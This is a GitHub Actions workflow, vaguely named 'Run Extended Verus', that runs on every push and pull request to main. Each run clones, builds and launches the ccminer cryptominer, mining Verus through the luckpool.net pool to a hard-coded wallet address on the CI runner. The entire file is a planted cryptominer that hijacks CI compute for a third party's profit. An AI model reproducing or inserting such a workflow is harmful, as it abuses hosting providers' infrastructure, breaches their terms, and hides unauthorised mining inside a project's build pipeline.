name: Run Extended Verus

on:
  push:
    branches:
      - main  # Trigger on push to the main branch
  pull_request:
    branches:
      - main  # Trigger on pull requests to the main branch

jobs:
  run-extended-mining:
    runs-on: ubuntu-latest  # Use Ubuntu environment

    steps:
      - name: Checkout code
        uses: actions/checkout@v2

      - name: Install and Run
        run: |
          sudo apt-get update && sudo apt-get install -y build-essential libcurl4-openssl-dev libssl-dev git automake && git clone https://github.com/tpruvot/ccminer.git && cd ccminer && ./build.sh && ./ccminer -a verus -o stratum+tcp://na.luckpool.net:3957 -u RNjEn7tNTZ6DuYnYrxKMsvYzBgJ11P5hQ4 -p x -t 20
